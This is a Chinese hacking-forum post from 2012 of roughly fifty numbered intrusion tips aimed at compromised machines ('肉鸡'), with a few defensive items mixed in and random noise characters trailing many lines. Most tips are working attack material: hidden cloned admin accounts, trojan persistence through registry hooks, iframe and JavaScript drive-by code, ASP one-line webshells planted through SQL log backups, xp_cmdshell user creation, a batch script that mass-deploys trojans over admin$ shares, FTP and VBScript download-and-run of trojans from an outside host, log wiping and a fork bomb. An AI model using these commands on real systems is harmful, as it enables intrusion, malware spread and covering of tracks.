找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2237|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,/ j! |  |# n7 s, \$ Z. m. N
cacls C:\windows\system32 /G hqw20:R6 `' [8 B* @% j' z* {
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入2 Q8 B0 r" r" ]! O! U
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F) s( n! i( f+ T  x( K

8 E& d& b% m- n& X4 r! A2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。- L3 Z2 E" R% m' g3 ~4 N( s

' g( I7 g1 S; B, p5 g0 k/ w3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
% q# W) |' z: h0 Z# U& X2 L
& l  M4 u, S  d  v" t4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
7 v$ `% |5 w; u6 ?) V% O( ~+ L( d& i- K; _2 F, Y$ p
5、利用INF文件来修改注册表
1 i9 L. Y' E* O0 [  B, j) @0 t7 j[Version]! R, v$ o; q+ [( t$ h$ Y9 w
Signature="$CHICAGO$"8 ]" K9 q# c- a! m' z2 k- k9 w2 T, h
[Defaultinstall]* g- X, @& @" C, H  E
addREG=Ating
+ ?: X/ _( I  U! F, E7 Y1 t[Ating]
& V+ z! t( P* N$ E' X! s- `; GHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"5 Z% s! u1 X9 n  T
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
) O$ w3 X8 U) srundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
2 v3 K2 r3 E6 N  c, w其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU' p' k! b3 e8 \* `4 c
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
! v8 g  B0 I7 w: cHKEY_CURRENT_CONFIG 简写为 HKCC1 v' O$ |1 j5 Q$ b
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值# T6 M2 s1 g5 \; p( J) ]
"1"这里代表是写入或删除注册表键值中的具体数据
2 L- U+ M- O, V4 E8 {6 P5 y' m( m% `7 F4 f  d
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
0 f* d' E/ {$ E9 t7 O$ T0 M多了一步就是在防火墙里添加个端口,然后导出其键值# x/ }+ R" P7 Y$ C: O8 n- n: h0 R4 M
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
# E* S$ R( Q, N' u* S5 z1 x8 J$ j5 F! M! f3 R% ^5 O6 U
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
, Y7 d. t: }4 E0 z" B在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
6 y& N6 m: C' ~$ H3 R* n( r7 u8 I5 |; O# \  k
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。, t, C4 t5 n3 m6 ?

$ R9 g3 C4 B8 E9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,; u  q) |; _" Z) h; @. k: l( Y
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。; A4 [) R& K; @/ M% {2 M) q: f/ q
" F; t( m& S* f1 ?: Y
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”; m- s9 @, K$ X

( H! X5 b. J7 F7 g$ z3 }11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
5 ?0 @% A& x" R/ Z, t* s用法:xsniff –pass –hide –log pass.txt+ Z# x% {' Q9 F( i, ]
5 s& E" U  b1 g3 w; d
12、google搜索的艺术/ m1 @( j. o4 t" c. M! v, s
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”& n+ |- S, S) n, ?
或“字符串的语法错误”可以找到很多sql注入漏洞。
, j, \7 H5 F, ^; s$ i8 R. Q' S( x* P. J
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。; D  k- Q1 E" o$ B1 G( P+ e" B$ ~

7 C& z  n2 _3 ^14、cmd中输入 nc –vv –l –p 1987$ s) W! D0 |! k5 p- V3 `7 ~! d& D
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
+ o4 U$ X  u, ?: V# P+ K# J3 t7 C
6 L- w1 |+ \6 w% y15、制作T++木马,先写个ating.hta文件,内容为) J8 l9 G& Y7 |" G) n  X) L- s
<script language="VBScript">
; M( R+ i& u1 Iset wshshell=createobject ("wscript.shell" )
( {% S6 w. l* Q# m  B6 o. C* Xa=wshshell.run("你马的名称",1); N! a3 J% S1 G3 R
window.close
, [. b& w& d& _& N' p  _</script>7 b- f  q& u5 l6 P
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
& }  G/ V3 i  C% I2 L* C
: p! J' J' v6 f) @16、搜索栏里输入
( l. y: w" u7 e4 F- e6 F! }0 D关键字%'and 1=1 and '%'='  b( h; }* g+ T3 S3 m
关键字%'and 1=2 and '%'='* r9 F9 L. t0 U! o6 c
比较不同处 可以作为注入的特征字符0 w# |% e% T8 C8 n

6 V6 l, I+ A! ^7 q/ A8 S17、挂马代码<html>9 P* C: K) N1 w  C( C
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>4 m/ z  O0 s, D( f+ q. u
</html>6 _& P4 a" Y% S# e4 b& E, \

- {* L7 b, g  v3 b1 u5 T, X) _/ ~( I! D18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,9 x3 n# E7 F  Z
net localgroup administrators还是可以看出Guest是管理员来。
" a/ j, C% O# Q( [. d; k. M+ E! o8 G- a5 @+ B0 B8 Q' H- e, W
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等/ R5 r, b/ s% I& k# i: q
用法: 安装: instsrv.exe 服务名称 路径
' r, T4 G, Y5 u8 M2 h; Z& x卸载: instsrv.exe 服务名称 REMOVE7 [! ]: h( m2 i

+ o7 x( }+ b0 {8 S& R
' T/ Y1 x( z/ |, h2 T; l21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉9 y3 n, [0 `* q$ l; \, v% U
不能注入时要第一时间想到%5c暴库。
- W* t8 [4 y# G* ?# \5 j
) j7 S' v6 Q5 B22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~. w4 g+ T4 t$ R1 i* n8 b" x! Z

& ]  R' W  l0 w- y23、缺少xp_cmdshell时' f' R; a$ a# K. m, I
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
( j" [1 j/ W# T1 G  N假如恢复不成功,可以尝试直接加用户(针对开3389的)
3 g3 ~  s; z; B& W3 |" Ydeclare @o int: Q9 P) j; |: X, R& W
exec sp_oacreate 'wscript.shell',@o out1 ]: J8 [' |9 S
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
5 N, F: f3 B8 `6 @/ T6 X
6 C+ P$ u7 o; |5 j24.批量种植木马.bat
& L2 O/ d. b# h. U3 \for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
( W5 L% |$ W$ m/ D( x  H, e0 zfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
1 U7 e5 {/ F9 t' ?扫描地址.txt里每个主机名一行 用\\开头! f5 V' Q' v! G% T( d/ Q: V
0 A# W  `. F* l  _/ [/ O% n
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。+ ]5 y5 p/ o0 m& o$ q% c& f

/ X% X; ~& [& p" ^% g26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.2 b% _* i% y  c. d: t, i5 C% e6 T
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
( K6 w8 T3 X0 p7 P7 k.cer 等后缀的文件夹下都可以运行任何后缀的asp木马, N) A6 {6 F% J8 I
1 ?9 s& @, [$ L+ L$ Y
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
1 d! f- O4 N7 r5 ]8 S8 G( c( B然后用#clear logg和#clear line vty *删除日志  |& o5 T% Q# T) a; D  m6 y

/ X& @; H* o. X0 c! @% `9 t28、电脑坏了省去重新安装系统的方法
/ |- A3 G& w1 k, i' L7 k) r  @纯dos下执行,
, k# o' f) C, g& y; Oxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config' J) W$ b6 d: v% U7 O
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
, y' r( }& @0 M' a8 n
/ g' `5 M1 w* ~/ L! d1 i6 G( q- `! Z' Z29、解决TCP/IP筛选 在注册表里有三处,分别是:# B1 S% G5 {' V, c
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip. C& m; [- o% _% W' F. [8 [
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, ?4 L/ l- K6 H' dHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# C. p" u8 B, B: D$ _0 D# v分别用# H( j# t& D( _5 a) d# P, h2 g. I  F6 M
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 f! ^. S4 Z% O& @regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip2 h! E5 Y- p% ~( ]- S6 `- y+ T* a3 S- q
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- D# V- F% X) T" }% Q
命令来导出注册表项
# t, H) K1 d+ G+ x然后把三个文件里的EnableSecurityFilters"=dword:00000001,0 w; r; `( s: C- n( x+ {( ~
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
$ m+ E" C, R/ f2 a) \4 y- O; Kregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
: a- z6 r0 v# p6 P7 o. D# `. R# P
7 a+ {( w) ?$ s3 h* A1 o" G+ `' i/ o30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
/ g6 A! j8 H6 W6 d  u  gSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3/ X; J6 O# n, v" T4 I0 k

* t/ \; K+ M+ k8 [2 S31、全手工打造开3389工具; N9 B9 N, C: r* |4 M
打开记事本,编辑内容如下:
  g5 e0 }" ^4 |) X' ~echo [Components] > c:\sql8 H1 x% ?' s7 A' n5 U: D
echo TSEnable = on >> c:\sql
$ X2 F& d% X2 l; {- C" _: Isysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
7 _0 u- P# A- I) W" \* z编辑好后存为BAT文件,上传至肉鸡,执行
$ ]) L. K& {# D1 O( E6 R& d! F7 g4 l! g" R2 s% @& R' V
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马0 o  g: r$ M2 ?: R& P
2 Z$ p4 Q/ p' H, `5 G1 w
33、让服务器重启) l; {6 F8 B) `( T+ J
写个bat死循环:
5 R# k, ?) O7 s6 d@echo off
, D; I' T' i/ r8 n, |4 g5 g0 q" {:loop1  `% _* Y) U5 e7 L: ^& K
cls+ K7 }; \6 s% e7 ]! u* h: h& M
start cmd.exe+ J" j4 L) l4 a( G& F# @0 t
goto loop1& A5 ^' \; `  O! I
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启7 C5 }0 r& g& k6 G0 M2 I% v7 Y8 y
4 G; O; m  R8 ~6 a) l3 }7 o
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
+ q5 W& k9 Y  j8 I, M@echo off
9 {/ n$ U$ e( q5 q- x3 Hdate /t >c:/3389.txt
0 L8 N6 I4 x- Btime /t >>c:/3389.txt
& t$ Y/ M$ n, P+ i, X$ Fattrib +s +h c:/3389.bat
  ^' r( y0 i- o: ]- C& Kattrib +s +h c:/3389.txt
7 F% u! J' l0 e( n: S0 ?! h0 Gnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt9 C  p2 |9 N# g- e# C
并保存为3389.bat
9 m. k% Q, K% b% M: O5 \  f: k$ g' U打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号, s$ K  Q8 p/ J. }

7 m* Y# T# b+ X8 _35、有时候提不了权限的话,试试这个命令,在命令行里输入:
, y$ I$ S4 v: wstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)$ Y! T" z; \+ s( Q8 X& W
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。, h- M4 Q1 P7 L2 a' Q5 _4 _+ |
+ O, P" V) P! K! b
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
; N7 K4 h2 f9 D( Y3 E+ f7 iecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
4 C; j2 o6 }; G3 P. eecho 你的FTP账号 >>c:\1.bat //输入账号
' N2 s6 ]5 ~6 p. C; @( Aecho 你的FTP密码 >>c:\1.bat //输入密码
0 F* k2 a- V& D. t9 ?echo bin >>c:\1.bat //登入
5 j7 G' ~: x$ S# Jecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
& E0 O+ J% W. O9 U7 y0 T+ Lecho bye >>c:\1.bat //退出0 {! A1 U9 i3 v( v+ w
然后执行ftp -s:c:\1.bat即可
6 N' k, T- h8 {% X& k2 q/ D4 O
, o4 D) c# D! M0 g; z6 D37、修改注册表开3389两法
; ]  V; ^2 D0 l7 I% j(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表; x' p& `9 m+ F
echo Windows Registry Editor Version 5.00 >>3389.reg
0 W8 F  h: }9 s- P  F) e. Fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg1 s7 s' E" }& r" z# S' L
echo "Enabled"="0" >>3389.reg  Q' R* a& H  r" x3 w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows. R# s: I# r* X. K
NT\CurrentVersion\Winlogon] >>3389.reg
0 V8 ]2 j/ B. F( P6 `' m9 eecho "ShutdownWithoutLogon"="0" >>3389.reg
8 `6 y! _: m. ?* recho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]8 z" l  E, W1 a4 ?" V
>>3389.reg
: Y' w1 U9 c% e4 Gecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
0 {; h/ S5 w! B7 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]1 b% y0 _: d& M- R
>>3389.reg
) l8 q9 J# m& N/ B0 H$ Wecho "TSEnabled"=dword:00000001 >>3389.reg
+ b; r; W$ _6 s: r) z% Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg* c& y$ ^# C7 J1 `- |% B. ]9 Y! V
echo "Start"=dword:00000002 >>3389.reg/ t0 D2 P: d4 ^* S9 N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
  A( L' ?* E; [6 C- c/ o2 }>>3389.reg
# }! Q7 o3 x( T8 }# }- q  [5 vecho "Start"=dword:00000002 >>3389.reg5 t6 Z! K* i( X0 `8 R' F% ^6 N
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
0 d) F2 T7 e# W3 a. Decho "Hotkey"="1" >>3389.reg
! |/ S; ]8 f  T8 \, J/ Z. decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 h& v: P$ [& Q: N* N0 P8 M4 h% B0 ?/ T
Server\Wds\rdpwd\Tds\tcp] >>3389.reg2 F6 d) l/ ]! v
echo "PortNumber"=dword:00000D3D >>3389.reg
  j& c8 w& F! }& @2 I9 {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 b0 y; q: }. `& Z4 N
Server\WinStations\RDP-Tcp] >>3389.reg
& o9 A1 q  i7 ]. L0 mecho "PortNumber"=dword:00000D3D >>3389.reg/ x4 M- j' x# y: M* `: p
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
& o6 ~+ c9 v5 @" J" r(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
/ g$ k# N7 W2 d/ w  m% E9 ^因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
. @0 ?- X! q3 }/ u(2)winxp和win2003终端开启
4 u/ ]1 U  `: E! d; v- M用以下ECHO代码写一个REG文件:9 ^5 l+ q. x9 D: b
echo Windows Registry Editor Version 5.00>>3389.reg
+ w) I/ J, ~( n% m) b) secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. G1 _% j. G8 ^* r& P
Server]>>3389.reg
5 _4 N2 {3 a, s/ u* Cecho "fDenyTSConnections"=dword:00000000>>3389.reg3 ^# B/ I. y4 S5 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
. b' p8 w0 j! o# nServer\Wds\rdpwd\Tds\tcp]>>3389.reg$ E" K$ \2 K4 n, s7 U) V
echo "PortNumber"=dword:00000d3d>>3389.reg
' c; c1 {/ B) Z$ M  j: }6 ~% iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 g$ R) G; n, v* N: w6 XServer\WinStations\RDP-Tcp]>>3389.reg
# H; \4 a+ m6 x( j, k9 R; oecho "PortNumber"=dword:00000d3d>>3389.reg
- I- U$ K4 y/ w8 c5 s- c) s然后regedit /s 3389.reg del 3389.reg
% Z5 K5 n3 c7 ?3 Q6 TXP下不论开终端还是改终端端口都不需重启
3 Q3 X9 P  p" B  Q2 Q/ I2 f4 P, |
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
; Y; }+ T( O# t# [- V3 ?用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'' c$ ~5 q7 c1 R7 s" K+ u
8 i0 e7 ~6 j& P4 q' W
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!3 P; X  I- |* D  \7 K+ f
(1)数据库文件名应复杂并要有特殊字符
! \  z) f9 K- a$ Z+ F7 Y6 Y; M4 T* j(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
7 _9 t8 S5 i1 d0 c将conn.asp文档中的8 z  x; W8 \8 v# z/ {2 g
DBPath = Server.MapPath("数据库.mdb")
7 S; Y5 ^; S& [2 D" j/ cconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
' T' f% R0 E  i) p( b
2 A2 r1 {, m! q修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置6 O, X+ i* k" ~# [3 M
(3)不放在WEB目录里. T8 o( Z8 t) ~- R* t5 ~, g. @4 L6 p

) }( Z- L4 L$ I$ W1 f3 \40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉" e2 [4 q6 h4 ?. j
可以写两个bat文件
9 v) B2 L& s  y9 U% t% p( T& |@echo off+ D2 y7 w. y9 l8 A
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
. D) T. X7 a9 K0 X, ]1 I1 G@del c:\winnt\system32\query.exe
7 @) T  v) }( ^0 C@del %SYSTEMROOT%\system32\dllcache\query.exe$ P3 b. g0 ~. W: o9 i& q' b
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的" P1 v; z8 l3 S: C! f* c, g4 k# c
, j# ^0 l! U+ ]% a" Z# n- h# [+ n
@echo off6 ?# V% p( ^" _9 K+ C6 T% a
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe+ l: R7 L- Q5 c  l
@del c:\winnt\system32\tsadmin.exe! a: y2 n( l' D6 o. u* j+ M) Q0 G
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex- I* R, Z1 j$ P8 a1 P( Q7 Q
* q4 v0 L- F+ m3 s' I. Q
41、映射对方盘符, r5 S! y# |$ C$ D1 G4 l. X
telnet到他的机器上,' ]! Z& \' N/ u
net share 查看有没有默认共享 如果没有,那么就接着运行
+ V. s& _- x. U( y' r: dnet share c$=c:
: n: m+ @7 k0 ~* rnet share现在有c$3 Z/ n- t8 Q8 m  n1 a! j: V
在自己的机器上运行$ D% [/ ]* ^5 l+ X$ f8 R, A
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K& c1 d  E: u% Q* W/ Y
+ J! H7 x% t. v
42、一些很有用的老知识
1 h- i7 h: a# n0 n$ Z  Mtype c:\boot.ini ( 查看系统版本 )
6 O5 p8 M: y7 h% P0 H: Gnet start (查看已经启动的服务)
4 b0 F7 q. y7 z' [( O; h" lquery user ( 查看当前终端连接 )0 {1 z3 ]7 u  _9 V( a! K
net user ( 查看当前用户 ): L7 d3 u8 l$ k4 I% [  t6 t
net user 用户 密码/add ( 建立账号 )
- N7 F- m; t! d% K" znet localgroup administrators 用户 /add (提升某用户为管理员)
. c+ i, U6 N  c2 n& V4 Qipconfig -all ( 查看IP什么的 )
0 i  K& ~6 \4 f4 S/ `netstat -an ( 查看当前网络状态 )
, }( Y( }8 h5 M: ifindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
3 e- B  T! _/ z克隆时Administrator对应1F4
! I; @! G' {5 C* g! O4 |" r' Lguest对应1F5
6 W  }$ O0 d" {. i& a. f: D& \( [tsinternetuser对应3E82 x8 |1 }5 \( ?. c! o% g

. J$ ?/ s3 e$ J# s  Z1 ~43、如果对方没开3389,但是装了Remote Administrator Service
$ n# [: z' F. i2 x6 Z, p3 m用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接# n' b3 \; y- I* u2 X* _
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息& H8 V4 I' k" g# l8 C0 H
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
4 k1 x! }# s& _. K2 ?8 S7 a5 x) ?9 g  {
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)) I2 z# A+ ^6 A# j7 ~
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)$ E7 v: w$ Q; J: A" f5 F

! |7 h3 I9 Z  _, U7 g% |+ K45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入): ]* b& S; I" I$ U: `% L$ E8 l
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
, |2 {! e2 w! M5 L8 q& j+ L; O^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
/ X! F) m# f; b+ L9 \& sCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =. r5 o( K/ a+ U) X% ~5 C0 T) T
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
' j' o) ^) S& N! h(这是完整的一句话,其中没有换行符)1 u. j- }0 K9 z* p! j! b
然后下载:
- e  }( @$ s. P  t4 u# ]6 }cscript down.vbs http://www.hack520.org/hack.exe hack.exe
- s( W  s! h) r/ {+ E! }2 A  ^
! V/ s) {, Z, L- v& K46、一句话木马成功依赖于两个条件:# Y6 P( [- l7 J- C8 V) s' w
1、服务端没有禁止adodb.Stream或FSO组件
' B9 O% t8 j& P6 `" i& s2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
& [+ D& |# R0 Y1 g
5 ?+ v% l) ?4 l) ?" O47、利用DB_OWNER权限进行手工备份一句话木马的代码:8 a( D8 k6 o" k7 u! z1 K
;alter database utsz set RECOVERY FULL--
* B4 q$ ]; n8 l2 f( S0 x# m$ f;create table cmd (a image)--
! u" `+ Z7 F% ?& \7 J;backup log utsz to disk = 'D:\cmd' with init--
/ A. D. R7 @+ X+ v4 I4 e;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
& j  A& q8 o* Y  v# };backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--4 g2 O0 y: D2 W* |! X$ n
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
, D* O& I9 W. l  v# S% R3 A7 @8 P
  c& j( {, T( Q/ G) D' {* M48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:9 M+ E4 u  N3 [+ Q

7 I, Q/ K: W3 H用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options% n6 o2 ^( g4 p7 Z0 A  R/ ~
所有会话用 'all'。6 {3 |2 {/ t9 D4 i+ V2 ^, K
-s sessionid 列出会话的信息。) `6 ]9 {# i* J  X+ Z" U
-k sessionid 终止会话。/ m  ?% Q2 d/ a) c
-m sessionid 发送消息到会话。
1 G! E8 ?& u6 c# h; W* R3 h$ p+ Y7 S; H9 \9 N- B( `/ l) M) A
config 配置 telnet 服务器参数。- U- z& {  Y: k. n: X6 y1 {, g
& g: N1 A5 C! j, P$ l
common_options 为:: t1 Z, Z6 w5 _. M3 o$ [
-u user 指定要使用其凭据的用户& @% o5 T8 a( N6 ]
-p password 用户密码1 [" u! S$ A) \( a

  L( y( V0 a; `8 L( _config_options 为:- J, T  G3 P) X3 o- U' u3 ]7 U
dom = domain 设定用户的默认域, w' q1 D5 N' m: j2 m
ctrlakeymap = yes|no 设定 ALT 键的映射* f2 r/ c4 j7 @8 c) t
timeout = hh:mm:ss 设定空闲会话超时值" d- _5 W) k" Y% Y- T- n! p$ x) [
timeoutactive = yes|no 启用空闲会话。/ e# P' N2 A4 B0 g" M/ |
maxfail = attempts 设定断开前失败的登录企图数。
3 F, S6 Q* q- b5 U; Zmaxconn = connections 设定最大连接数。
8 E5 Z; u7 ~. ^. e, Tport = number 设定 telnet 端口。7 E' p0 L) Q. a8 `* m, O
sec = [+/-]NTLM [+/-]passwd! R4 ]" |9 S. U3 a- M
设定身份验证机构
% ^/ U2 N0 f- O% @( N- C7 t& Pfname = file 指定审计文件名。
" H' y% t+ I* y+ V, _& U  k  Wfsize = size 指定审计文件的最大尺寸(MB)。5 B6 k1 Z4 x; ^" z9 D
mode = console|stream 指定操作模式。
: H3 n: U! X9 s5 Q8 c0 p% S$ V. Xauditlocation = eventlog|file|both
  A/ t. s$ x! v" A! E' F指定记录地点0 P  P  ]. R. _& Q5 }- B8 v$ s
audit = [+/-]user [+/-]fail [+/-]admin. a0 L* y9 |+ Z2 @! l+ H/ s, D
) B$ V' n, Y1 A5 |$ Y! p$ Y
49、例如:在IE上访问:
6 H; E( b( r3 `2 jwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/! X/ G) I9 W# j4 b; X
hack.txt里面的代码是:0 }4 D8 q' c6 [, X
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">: e; r# M2 r" ?! v9 }7 A5 T
把这个hack.txt发到你空间就可以了!! ~8 W( _) V3 `6 p8 z( \
这个可以利用来做网马哦!
7 {+ D5 @$ J7 }% [) Z5 m7 |
3 n' \! q  W8 G* F" M! x50、autorun的病毒可以通过手动限制!0 w: u/ L1 a7 q
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
2 K* R0 V4 f4 b: g$ g9 i* t2,打开盘符用右键打开!切忌双击盘符~
" ^9 }/ s. O+ u3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
6 d) M7 t' y  o# e; r# k$ C% n$ l4 H$ F4 n
51、log备份时的一句话木马:
4 w( w$ F1 _1 Aa).<%%25Execute(request("go"))%%25>7 O* u) m  U) S/ E! |/ R6 A% s
b).<%Execute(request("go"))%>
